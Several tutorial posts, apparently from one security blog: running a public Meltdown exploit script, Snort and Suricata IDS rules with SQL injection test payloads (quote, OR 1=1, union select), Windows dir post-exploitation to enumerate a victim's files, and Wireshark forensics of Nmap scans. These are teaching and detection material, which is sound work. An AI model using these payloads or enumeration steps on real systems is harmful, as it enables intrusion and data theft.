Hello Friends!! You must be heard of the latest vulnerbility “Meltdown” which has been discovered almost in every CPU having intel processessor, from this link you can check list of vulnerable CPU discription. Today we are going to disccuss how to “Check Metltadown vulnerability in any CPU” by using a script.

From Wikipedia

Meltdown is a hardware vulnerability affecting Intel x86 microprocessors and some ARM-based microprocessors. It allows a rogue process to read any physical, kernel or other process’s mapped memory, regardless of whether or not it should be able to do so. It allows an unauthorized process to read data from any address that is mapped to the current process’s memory space, because instruction pipelining in the affected processors means that the data from the unauthorized address will almost always be temporarily loaded into the CPU’s cache during speculative execution, from which it can be recovered using other techniques, even if the original read instruction eventually fails due to privilege checking and never produces a readable result. Since many operating systems map physical memory, kernel processes, and other running user space processes into the address space of every process and rely on privilege checking to prevent unauthorized access, Meltdown effectively allows a rogue process to read any physical, kernel or other process’s mapped memory, regardless of whether or not it should be able to do so. Accordingly, many servers and cloud services were impacted, as well as a potential majority of smart devices and embedded devices using ARM based processors (mobile devices, smart TVs and others), including a wide range of networking equipment.

Let’s start!!

Open the terminal and type given below command to download the script form git hub. It can only dump linux_proc_banner which is work as an interface for internal data structures in the kernel and it is used to get information regarding the system and to change certain kernel Process.

 git clone https://github.com/paboldin/meltdown-exploit.git 

 From given below image you can observe I had successfully download this script in my Linux machine.

Now explore the downloaded folder in terminal now run the command “make” for compiling the program file before running the script.

Now run the script by executing given below command which will identify the state of vulnerability by read its memory space.

./run.sh

From given below image you can observe where it is vulnerable ON has dumped the complete detail of CPU Processor. So here it has shown some details such as:

Vendor Id: Vendor ID or VID is unique number assign to a Hardware to identify it on which system it has been installed.

CPU family: Same functionality Processors are categories into same family, here CPU family 6 means indicate a model from Pentium Pro family.

Model: Indicates model number of CPU family.

Model name: Holds Model name of Processor

Stepping: It is used identify the version of microprocessor

Microcode: it is a lowest instruction set permanently to control the microprocessor

CPU MHz: Describe Usage of CPU.

Cache size: Define the size of cache memory.

You can also verify above result by executing given below command which is used for obtaining details of system information.

Source: https://github.com/paboldin/meltdown-exploit

The post Check Meltdown Vulnerability in CPU appeared first on Hacking Articles.

Hello friends!! Today we are going to discuss how to “Detect SQL injection attack” using Snort but before moving ahead kindly read our previous both articles related to Snort Installation (Manually or using apt-respiratory)and its rule configuration to enable it as IDS for your network.

Basically In this tutorial we are using snort to capture the network traffic which would analysis the SQL Injection quotes when injected in any web page to obtain information of database system of any web server. Snort will generate the alert for malicious traffic when caught those traffic in its network and network administers will immediately get attentive against suspicious traffic and could take effective action against the attacking IP.

Requirement

IDS: Snort (Ubuntu)

Web application: Dhakkan

You can configure your own web server by taking help of our article “Configure Web server for penetration testing”

Let’s Begin!!

Identify Error Based SQL Injection

As we know in Error based SQL injections the attacker use single quotes (‘) or double quotes (“) to break down SQL query for identify its vulnerability. Therefore be smart and add a rule in snort which will analyst Error based SQL injection on the server when someone try to execute SQL query in your network for unprivileged access of database.

Execute given below command in ubuntu’s terminal to open snort local rule file in text editor.

sudo gedit /etc/snort/rules/local.rules

Now add given below line which will capture the incoming traffic coming on any network IP via port 80.

alert tcp any any -> any 80 (msg: “Error Based SQL Injection”; content: “%27” ; sid:100000011; )

alert tcp any any -> any 80 (msg: “Error Based SQL Injection”; content: “22” ; sid:100000012; )

If you read above rule you can notice that I had applied filter for content “%27” and %22 are URL encoded format use in browser for single quotes(‘) and double quotes (“)  respectively at the time of execution of URL.

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now test your above rule by making Error based sql injection attack on web application “Dhakkan”, therefore open the server IP in web browser and use single quotes (‘) for identify SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-1/?id=1’

For more detail on Error Based SQL injection read our previous article.

Now when attacker will execute malicious quotes in browser for testing Error Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our prediction from given image you can observe the snort has gerenated alert for Error Based sql injection when capture malicious quotes.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Testing Double Quotes Injection

Now again open the server IP in web browser and use double quotes (“) for identify SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-4/?id=1”

Now when attacker will execute malicious quotes in browser for testing Double quotes SQL injection then the IDS of the network should also capture this content and will generate the alert.

From given image you can observe the snort has gerenated alert for Error Based sql injection when capture malicious quotes.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming from 192.168.1.21 on port 80.

Boolean Based SQL Injection

As we know in Boolean based SQL injections the attacker use AND /OR  operators  where attacker will try to confirm if the database is vulnerable to Boolean SQL Injection by evaluating the results of various queries which return either TRUE or FLASE.

Now add a rule in snort which will analyse Boolean based SQL injection on the server when someone try to execute SQL query in your network for unprivileged access of database. Here I had applied filter for content “and” & “or” to be captured. Here nocase denotes not case sensitive it can be as AND/and, OR/or.

alert tcp any any -> any 80 (msg: “AND SQL Injection”; content: “and” ; nocase; sid:100000060; )

alert tcp any any -> any 80 (msg: “OR SQL Injection”; content: “or” ; nocase; sid:100000061; )

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again open the server IP in web browser and use AND operator for identify Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-8/?id=1’ AND 1=1 –+

For more detail on Boolean Based SQL injection read our previous article.

Now when attacker will execute malicious quotes in browser for testing Boolean Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

Testing OR Operator

As per our calculation from given image you can observe the snort has gerenated alert for Boolean Based sql injection when captured content AND.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Again open the server IP in web browser and use OR operator to identify Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-8/?id=1’ OR 1=1 –+

Now when attacker will execute malicious quotes in browser for testing Boolean Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our calculation from given image you can observe the snort has gerenated alert for Boolean Based sql injection when captured content OR.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Encoded AND/OR

Similarly in given below rule I had applied filter for content “%26%26” and “%7c%7c” are URL encoded format use in browser for && and || respectively at the time of execution of URL.

alert tcp any any -> any 80 (msg: “AND SQL Injection”; content: “and” ; nocase; sid:100000008; )

alert tcp any any -> any 80 (msg: “OR SQL Injection”; content: “or” ; nocase; sid:100000009; )

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again open the server IP in web browser and use && operator for identify Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-25/?id=1’ %26%26 1==1 –+

For more details read our previous article

Now when attacker will execute malicious quotes in browser for testing Boolean Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our calculation from given image you can observe the snort has gerenated alert for Boolean Based sql injection when captured content %26%26.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Testing Encoded OR Operator

Again open the server IP in web browser and use || operator for identify Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-25/?id=1’ %7C%7C 1==1 –+

Now when attacker will execute malicious quotes in browser for testing Boolean Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our calculation from given image you can observe the snort has gerenated alert for Boolean Based sql injection when captured content %7C %7C.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Identify Form Based SQL Injection

The Form Based SQL injection also known as “Post Error based SQL injection” because the attacker executes malicious quotes inside Login form of a web page that contains text field for username and password to login inside web server.

Therefore now add a rule in snort which will analyst Form based SQL injection on the server when someone try to execute SQL query in your network for unprivileged access of database.

alert tcp any any -> any 80 (msg: “Form Based SQL Injection”; content: “%27” ; sid:1000003; ) 

If you read above rule you can notice that I had applied filter for content “%27” to be captured; turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

I had used single quotes (‘) to break the query inside the text field of username then click on submit.

Username:      ’

From the given screenshot you can see we have got error message (in blue colour) which means the database is vulnerable to SQL injection.

For more detail on Form Based SQL injection read our previous article.

Now when attacker will execute malicious quotes in browser for testing Form Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our prediction from given image you can observe the snort has gerenated alert for Form Based sql injection when capture malicious quotes.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Identify Order by SQL Injection

In order to identify number of column in database the un-trusted user may use order by clause which will arrange the result set in ascending or descending order of the columns used in the query.

Now add a rule in snort which will analyst order by SQL injection on the server when someone try to execute SQL query in your network for unprivileged access of database. Here again that I had applied filter for content “order” to be captured.

alert tcp any any -> any 80 (msg: “Order by SQL Injection”; content: “order” ; sid:1000005; )

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now again open the server IP in web browser and use string order by for identify column of database as shown below.

192.168.1.20/sqli/Less-1/?id=1′ order by 1,2,3 –+

Now when attacker will execute malicious string in browser for testing order by SQL injection then the IDS of the network should also capture this content and will generate the alert

As per our prediction from given image you can observe the snort has gerenated alert for order by sql injection when capture malicious string.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicious traffic is coming form 192.168.1.21 on port 80.

Identify Union Based SQL Injection

We all know in Error base SQL injection attacker may use the UNION operator to combine the result-set of two or more SELECT statements. Therefore add a rule in snort which will analyst Union select SQL injection on the server when someone try to execute SQL query in your network for unprivileged access of database. Here again that I had applied filter for content “union” to be captured.

alert tcp any any -> any 80 (msg: “UNION SELECT SQL Injection”; content: “union” ; sid:1000006; )

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now again open the server IP in web browser and use string order by for identify column of database as shown below.

192.168.1.20/sqli/Less-1/?id=-1′ union select 1,2,3 –+

Now when attacker will execute malicious string in browser for testing Union select SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our prediction from given image you can observe the snort has gerenated alert for union select sql injection when capture malicious string.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicious traffic is coming form 192.168.1.21 on port 80.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Detect SQL Injection Attack using Snort IDS appeared first on Hacking Articles.

Suricata is developed by the Open Information Security Foundation. Suricata is a high performance Network IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF and its supporting vendors.

Features

IDS / IPS

Suricata implements a complete signature language to match on known threats, policy violations and malicious behaviour. Suricata will also detect many anomalies in the traffic it inspects. Suricata is capable of using the specialized Emerging Threats Suricata ruleset and the VRT ruleset.

High Performance

A single Suricata instance is capable of inspecting multi-gigabit traffic. The engine is built around a multi threaded, modern, clean and highly scalable code base. There is native support for hardware acceleration from several vendors and through PF_RING and AF_PACKET.

Automatic protocol detection

Suricata will automatically detect protocols such as HTTP on any port and apply the proper detection and logging logic. This greatly helps with finding malware and CnC channels.

NSM: More than an IDS

Suricata can log HTTP requests, log and store TLS certificates, extract files from flows and store them to disk. The full pcap capture support allows easy analysis. All this makes Suricata a powerful engine for your Network Security Monitoring (NSM) ecosystem.

From: https://suricata-ids.org/

Lets Begin!!

We had chosen ubuntu operating system for installation and configuration of suricata. Earlier than installing suricata in your machine, you should need to install necessary dependencies of ubuntu. Therefore open the terminal and type given below command to install pre-requisites by a making update.

apt-get update

It is an easiest way to install and configure the suricata in your system because it’s entire requirement whether it is suricata rules directory or logging directory every packages is are stored by apt repository. Enter given below command to begin the suricata installations.  

apt-get install suricata -y

Now we need to create an empty text document file for our local rules inside rule folder of suricata

touch /etc/suricata/rules/local.rules

After then open the configuration file using gedit for making some changes inside.

gedit /etc/suricata/suricata-debian.yaml

The two most important steps we need to perform here:

1. Comment all others available file of rules so that only yours local rule file will be in priority.
2. Mention the local.rules under the rule files list.

Now add the network CIDR for which IDS will filter the incoming and outgoing traffic as shown in given below image.

Here we had set HOME_NET 192.168.1.0/24

Now open the local rule file to add your own network filtering rules in side it

gedit /etc/suricata/rules/local.rules

Now if you are not much aware about its rule configuration then you need not to be worry about it because implementing rule in suricata is as similar as in snort. For help open this Link to get details of IDS rule implementation.

alert icmp any any -> 192.168.1.111 any (msg: “ICMP detected”; sid:10000001;)

The above rule will generate an alert when found any network IP sending ICMP packets in our network by pinging IP 192.168.1.111.

Now execute following command to make GRO (Generic receive offload) disable on specific interfaces with help of Ethtool.

ethtool -K ens33 gro off

Then again turn On NIDS mode of surictata using given below command.

suricata -c /etc/suricata/suricata-debian.yaml -i ens33

Now let’s ping the IP: 192.168.1.111 from another system to test whether our NIDS will generate alert for ICMP packet or not. From given image you can read the command: ping 192.168.1.111 where you can observe it has sent 3 ICMP request packets.  

Basically suricata alert logs are generated under var/log and you can use given below command to read the captured logs.

tail -f /var/log/suricata/

As result suricata with NIDS mode had capture only 3 ICMP packets from IP 192.168.1.102 which you can observe from given below image that generated alert for “ICMP Detected”, this happens because in above rule we had applied “->”one-directional operators which mean it will only capture traffic coming from source IP to destination IP.

Here you can perceive that both two packets of ICMP is coming from 192.168.1.102 to 192.168.1.111 which means it has only captured ICMP Echo-request packets form source IP. 

Author: Mohit Chauhan is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post How to Configure Suricata IDS in Ubuntu appeared first on Hacking Articles.

In this article you will learn how to use Windows Command Line Command “dir” and extract files, get information about Number of files of a particular extension and much more using Metasploit framework. 

dir Command: It displays a list of a directory’s files and subdirectories.

Syntax

dir [<Drive>:] [<Path>] [<FileName>] [/p] [/q] [/a [[:] <Attributes>]] [/s] [/b]

[/p]: Displays one screen of the listing at a time.

[/q]: Displays file ownership information.

[/s]: Lists every occurrence of the specified file name within the specified directory and all subdirectories.

[/b]: Displays a bare list of directories and files, with no additional information.

[/a]: Attributes (Additional Options).

It is usually attached with options such as

[/ad]:  Directories

[/ah]:  Hidden files

[/as]:  System files

[/a-attribute]: Not (It is used when opposite of the attribute is to be obtained)

Now to use dir for Post Exploitation, we will need an Administrator Privileged shell, which can be found here.

Now we will use different combinations of the attributes and parameters to extract data from victim’s system.

Find Directories using a search string

Here, we are using following options with dir command:

[/b] to get a bare search,

[/s] to get a verbose result,

[/ad] to get the list of directories,

Containing string *sales* in their name.

Syntax: dir /b /s /ad [directory]\*string*

Example:  dir /b /s /ad d:\*sales*

Find the Number of Files/Directories in a Directory

If we need the Number of files, i.e. no. of files we have to add find command by piping [|] it with dir.

 Example: dir /b | find /c /v “”

Here [/b] to get a bare search and [/c] switch tells the find tool to Number how many lines contain your search terms, and [/v] switch will show any lines that don’t contain the string of words which you have specified in this case “”. As a file name cannot be nothing (“”) so it will Number all the file names.

Here, we are using

Above command return number of files in the Directory you are currently in. In my case it returns 22, which means victim has 22 files in his D:\ directory.

Find the Number of files

Here, we are using

Example: dir /b /s /a-d d:\*sales* | find /c /v “”

[/ad] is for Directories.

[-] is used as NOT so [/a-d] is for not directories i.e. files

Also find /c /v “” is used to get the Number. From given below image you can observe here it found 5 files inside sales folder.

Find the Number of Directories

Syntax: dir /b /s /ad [directory]\*string* | find /c /v “”

Example: dir /b /s /ad d:\*sales* | find /c /v ””

Here we need to get the Number of directories named *sales* It can be anything mentioned in *string*.

[/ad] is for Directories

Here find /c /v ”” is used to get a Number and from given below image you can observe here it found 5 subdirectories inside sales folder.

Find Files of a Particular Extension

In the given example, I searched for .xlsx files which are MS-Excel Files, but we can use it for any extension file like pdf, png, exe, docs etc.

Syntax: dir /b /s [directory]\*extension*

Example: dir /b /s d:\*.xlsx*

From given below image you can read name of excel files inside D: drive.

Find the Number of Files of a particular Extension

If we add find /c /v”” we will get the Number of files of a particular extension as shown below.

Example: dir /b /s d:\*.xlsx* | find /c /v “”

 From given below image you can observe here it found 4 excel files inside D: drive.

Find the Number of Hidden Files/Directories

To get hidden files we will use the attribute [/ah].

And when combined with find /c /v “”, we will get the Number of the hidden files/directories in the given directory as shown below.

Syntax: dir /b /ah [directory] | find /c /v “”

Example: dir /b /ah d:\ | find /c /v “”

From given below image you can observe here it found 3 hidden files inside D: drive.

Find the Hidden Files/Directories in a Directory

To view the Hidden Files in the give directory we will use attribute [/ah] with [/b] to get a bare result of the hidden files.

Syntax: dir /b /ah [directory]

Example: dir /b /ah d:\

From given below image you can read name of hidden files inside D: drive.

Find the System Files Stored in a Directory

To get the System Files we will use another attribute which is [/as], combined with [/b] it will give the names of the system files stored in the given directory.

Example: dir /b /as d:\

From given below image you can read name of system files inside D: drive.

Author: Pavandeep Singh is An Ethical Hacker, Cyber Security Expert, Penetration Tester, India. Contact here

The post Post Exploitation in Windows using dir Command appeared first on Hacking Articles.

Hello friends!! Today we are discussing about how to read hexadecimal bytes from an IP Packet that help a network admin to identify various types of NMAP scanning. But before moving ahead please read our previous both articles “Network packet forensic” and “NMAP scanning with Wirehsark” it will help you in better understanding of this article.

Requirement

Attacking tool: Nmap

Analysis tool: wireshark

We are going to calculate hexadecimal bytes of wireshark using given below table and as we know wireshark capture network packet mainly of 4 layers which is described below in table as per OSI layer model and TCP/IP layer model.

Nmap ARP Scanning

Let’s  start!!

Hopefully reader must be aware of basic NMAP scanning techniques if not then read it from here, now open the terminal and execute given below command which known as “HOST SCAN” to identify live host in network.

nmap -sn 192.168.1.100

Nmap uses the –sP/-sn flag for host scans and broadcast ARP request packet to identify which IP is allocated to particular host machine. From given below image you can observe that “1 host up” message.

Working of ARP Scan for Live Host

1. Send ARP request for MAC address
2. Receive MAC address though ARP Reply packet

Step to Identify Nmap ARP Scan

• Collect Ethernet Header details

Here we used wireshark to capture the network packet coming from victim’s network and in order to analysis only ARP packet we have applied filter “ip.addr == VICTIM IP || arp” as shown in given below image. Here you will find 2 arp packets, basically the 1st arp packet is broadcasting IP for asking MAC address of that network and the 2nd packet is unicast contains Answer of IP query.

Now let’s read Hex value of Ethernet header for identifying source and destination Mac addresses along with that we can also enumerated the bytes used for encapsulated packet, in order to identifying Ether type is being used here.

Hence from Ethernet header we can conclude it as ARP broadcast packet asking for destination Mac address.There shouldn’t be any uncertainty in concern with source Mac address who is responsible for sending packet but if we talk about Destination Mac address then we got ff:ff:ff:ff:ff:ff:ff which means exact Destination is machine is not available here. Further moving ahead we found Ether type 0x0806 highlighted in yellow color is used for ARP protocol.

Collect ARP Header (Request/Reply)

In order to identify ARP scan you need to investigate some important parameters which could help a network admin to make correct assumption in concern of ARP scann.

Try to collect following details as given below:

• Opcode (Request/Reply)
• Source Mac
• Source IP
• Destination MAC
• Destination IP

Now with help of following table you can read the hex value highlighted in above and below image for ARP Request and Reply packets  respectively.

Nmap ICMP Scanning

Now execute given below command which known as “HOST SCAN” to identify live host in network by sending Ping request with the help of ICMP packet.

nmap -sn 192.168.1.100 –disable-arp-ping

Now above command will send ICMP request packet instead of ARP request for identifying live host in network.

Working of NMAP ICMP Ping when host is live:

1. Send ICMP echo request packet.
2. Receive ICMP echo reply.

• Send TCP SYN packet on any TCP port (this port must be rarely blocked by network admin).

1. Receive TCP RST-ACK from target’s Network.

As a result NMAP give “HOST UP” message as shown in given below image.

Step to Identify NMAP ICMP Scan

• Collect IP Header Details for Protocol version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Since we know ICMP is Layer 3 protocol according to OSI model therefore we need to focus on following details for ICMP forensic with help of IP Header of a packet.

Try to collect following details as given below:

1. Ip header length 20 Bytes (5bits*4=20 bytes)
2. Protocol (01 for ICMP)
3. Source IP
4. Destination IP

From given below image you can observe Hexadecimal information of IP header field and using given table you can study these value to obtain their original value.

The IP header length is always given in form of bit and here it is 5 bit which is also minimum IP header length and to make it 20 bytes multiple 5 with 4 i.e. 5*4 bytes =20 bytes.

Identify ICMP Message type  (Request /Reply)

Now we had discussed above according to Nmap ICMP scanning technique the 1st packet is should be ICMP echo request packet and 2nd packet is should be of ICMP echo reply packet.

Now with help of following table you can read hex value highlighted in above and below image for ICMP Request and Reply packets  respectively.

• Identify TCP Flags

AS discussed above after ICMP reply, the 3rd packet should be of TCP-SYN packet and 4^th should be of TCP-RST/ACK.  We had seen in our previous article the hex value of all TCP-Flags are different from each other, so if we are talking for TCP-SYN flag then its Hex value should 0x02.

From given below table you can observe the sequence of TCP flag and how bits of these flag are set for sending packet to destination port.

For example if you found TCP SYN packet then the bit for SYN flag is set 1 for which the binary value will be 000000010 and its hexadecimal will be 0x02.

Sometime you will get combination of two or more flag in TCP header, so in that scenario take the help of following table to read the Hex value of such packet to identify TCP flags bits are being set 1.

For example if you found TCP SYN/ACK packets then indicates that SYN & ACK flags are set 1 for which the binary value will be 000010010 and its hexadecimal will be 0x12

Therefore I design below table to let you know more about of Hex value when  two or more than two flags are set 1.

The image given above contains the hex value of TCP-SYN packets and the image given below contains the hex value of TCP-RST/ACK packet from which we can calculate the source port and the destination port of the packet respectively like one given below.

Conclusion! So as stated above regarding the working of NMAP ICMP scan we had obtain the hex value for every packet in same sequence.Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that Someone has Choose NMAP ICMP scan for Network enumeration.

Default NMAP Scan (Stealth Scan)

Here we are going  with default scan method to enumerate “open”state of any specific port

nmap -p 80 192.168.1.100

Working of Default Scan for open port:

1. Send TCP-SYN packet
2. Receive TCP-SYN/ACK

• Send TCP-RST packet

It is also known as half Open TCP Scan as it does not send ACK packet after receive SYN/ACK packet .

Step to Identify NMAP Default Scan (Stealth Scan)

• Collect IP Header Details for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800.

Try to collect following details as given below:

1. Ip header length 20 Bytes (5bits*4=20 bytes)
2. Protocol (6 for TCP)
3. Source IP
4. Destination IP

From given below image you can observe Hexadecimal information of IP header field and using given table you can study these value to obtain their original value.

• Analysis TCP Header  Details

Since from above image we had obtain Source and Destination IP and protocol used for communication i.e. TCP, now we need to identify source and Destination port and TCP Flag used for establishing connection between two system.

In image we have highlighted source port in “Light brown” color and destination port in “yellow color”, you can use given below table to read the hex value of given image.

So we come to know that here TCP-SYN packet is used for sending connection request on Port 80.

Again we read next packet then here we found hex value 12 indicates that TCP-SYN/ACK has been send from port 80.

Take the help given above table to read the hex value of given image. Hex value 12 for TCP flag is used for SYN + ACK as explained above,  and we get 0x12 by adding Hex value “ 0x02 of SYN” and “0x10 of ACK”. 

In the image given below we come to know that TCP-RST packet is used for sending Reset connection to Port 80.

Conclusion! So as declared above regarding the working of NMAP default scan or NMAP stealth scan we had obtain the hex value for every packet in same sequence.Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that Someone has Choose NMAP Default scan for Network enumeration.

Nmap TCP Scan

Here we are going  with TCP scan to enumerate state of any specific port

nmap  -sT  -p 80 192.168.1.100

Working of Default Scan for open port:

1. Send TCP-SYN packet
2. Receive TCP-SYN/ACK

1. Send TCP-ACK packet
2. Send TCP-RST/ACK packet

Step to Identify NMAP TCP Scan  

• Collect IP Header Details for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800.

Try to collect following details as given below:

1. Ip header length 20 bytes (5bits*4=20 bytes)
2. Protocol (06 for TCP)
3. Source IP
4. Destination IP

It is quite similar as NMAP stealth Scan and using given table you can study these values to obtain their original value.

• Analysis TCP Header  Details

NMAP TCP Scan follow 3 way handshak of TCP connection for enumeration open port. Identfying source and destination port along with Flag hex value (TCP-SYN) is similar as above.

So we come to know that here TCP-SYN packet is used for sending connection request on Port 80.

Again we read next packet then here we found hex value 12 indicates that TCP-SYN/ACK has been send via port 80.

The only difference between Stealth Scan and TCP scan is that here packet of ACK flag is send by source machine who initiate the TCP communication.  Again we read next packet then here we found hex value 0x10 indicates that TCP- ACK has been send via port 80.

Conclusion! So as stated above regarding the working of NMAP TCP scan we had obtain the hex value for every packet in same sequence.Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that Someone has Choose NMAP Default scan for Network enumeration.

NOTE:  For  packet TCP-RST/ACK the hex value will be “ 0x14” send by the attacker machine

Nmap FIN Scan

Here we are going  with TCP-FIN scan to enumerate “OPEN” state of a particular port in any Linux based system therfore excute given below command.

nmap  -sF  -p 22 192.168.1.104

Working of FIN Scan for open port: Send  2 packets of TCP-FIN on a specific port

FIN is part TCP flag and NMAP used FIN flag to initiate TCP communication instead of following three way handshake communication.

Step to Identify NMAP FIN Scan  

• Collect IP Header Details for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect following details as given below:

1. Ip header length 20 Bytes (5 bits*4=20 bytes)
2. Protocol (06 for TCP)
3. Source IP
4. Destination IP

It is quite similar as NMAP above Scan and using given below table you can study these values to obtain their original value.

• Analysis TCP Header  Details

Now lets Identfying source and destination port along with Flag hex value (TCP-FIN) is similar as above.

So through given below image and with help of table we came to know that here TCP-FIN packet is used for sending connection request on Port 22.

Conclusion! So as declared above regarding the working of NMAP FIN scan we had obtain the hex value for every packet in same sequence.

Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that Someone has Choose NMAP FIN scan for Network enumeration.

NOTE:  If  you found 1st FIN packet (0x01) and 2^nd RST packet (0x04) then indicates “Closed Port” on tagered network.

Nmap NULL Scan

Here we are going  with TCP Null scan to enumerate “OPEN” state of any specific port in any Linux based system.

nmap  -sN  -p 22 192.168.1.104

Working of Null Scan for open port: Send  2 packets of TCP-NONE on specific port

Here NMAP used NONE flag  (No flag) to initiate TCP communication and bit of each flag is set “0”instead of following three-way handshake communication.

Step to Identify NMAP Null Scan  

• Collect IP Header Details for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect following details as given below:

1. Ip header length 20 Bytes (5bits*4=20 bytes)
2. Protocol (06 for TCP)
3. Source IP
4. Destination IP

It is quite similar as NMAP above Scan and using given table you can study these values to obtain their original value.

• Analysis TCP Header  Details

Now lets Identifying source and destination port along with Flag hex value (TCP-NONE) is similar as above.

So through given below image and with help of table we come to know that here TCP-NONE packet is used for sending connection request on Port 22.

Conclusion! So as stated above regarding the working of NMAP NONE scan we had obtain the hex value for every packet in same sequence.

Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that someone has Chosen NMAP NONE scan for Network enumeration.

NOTE:  If  you found 1st NONE packet (0x00) and 2^nd RST packet (0x04) then indicates “Closed Port” on target network.

Nmap XMAS Scan

Here we are going with XMAS scan to enumerate “OPEN” state of any specific port in any Linux based system

nmap  -sX  -p 22 192.168.1.104

Working of XMAS Scan for open port: Send 2 packets of TCP Flags in combination of FIN, PSH, URG on specific port.

Here NMAP used 3 TCP flags (FIN, PSH, and URG) to initiate TCP communication and bit of each flag is set “1”instead of following three way handshake communications.

Step to Identify NMAP XMAS Scan  

• Collect IP Header Details for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect following details as given below:

1. Ip header length 20 Bytes (5bits*4=20 bytes)
2. Protocol (06 for TCP)
3. Source IP
4. Destination IP

It is quite similar as NMAP above Scan and using given table you can study these values to obtain their original value.

• Analysis TCP Header  Details

Now lets Identifying source and destination port along with Flag hex value (TCP-XMAS) is similar as above.

So through given below image and with help of table we come to know that here TCP flags {FIN,PSH,URG} packet is used for sending connection request on Port 22.

Conclusion! So as stated above regarding the working of NMAP XMAS scan we had obtain the hex value for every packet in same sequence.

Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that someone has Choose NMAP XMAS scanned for Network enumeration.

NOTE: 

• If you found 1st {FIN, PSH, URG} packet (0x29) and 2nd RST packet (0x04) then indicates “Closed Port” on targeted network.
• NMAP FIN, NMAP NULL and NMAP XMAS scan are only applicable on Linux based system

Nmap UDP Scan

Here we are going  with XMAS scan to enumerate state of any specific port in any Linux based system

nmap  -sU  -p 68 192.168.1.104

Working of XMAS Scan for open port: Send  2 packets of UDP on specific port

It is quite different from TCP communication process because here no Flag are used for establishing connection or initiate connection request with target’s network.

Step to Identify NMAP UDP Scan  

• Collect IP Header Details for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect following details as given below:

1. Ip header length 20 Bytes (5 bits*4=20 bytes)
2. Protocol (11 for UDP)
3. Source IP
4. Destination IP

It is quite similar as NMAP above Scan as “IP header” and “Ethernet header” information will be same either is TCP communication or UDP communication and using given table you can study these values to obtain their original value.

Basically 11 is hex value use for UDP protocol which is quite useful in identify NMAP UDP scan from remanding scanning method.

1. Analysis UDP Header  Details

Now lets Identifying source and destination port a as done above in TCP Scanning.

Conclusion! Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that Someone has Choose NMAP UDP scan for Network enumeration.

NOTE:  If  you found 1st UDP packet and 2^nd UDP with ICMP Message Port is unreachable then indicates “Closed Port” on target network.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Forensic Investigation of Nmap Scan using Wireshark appeared first on Hacking Articles.

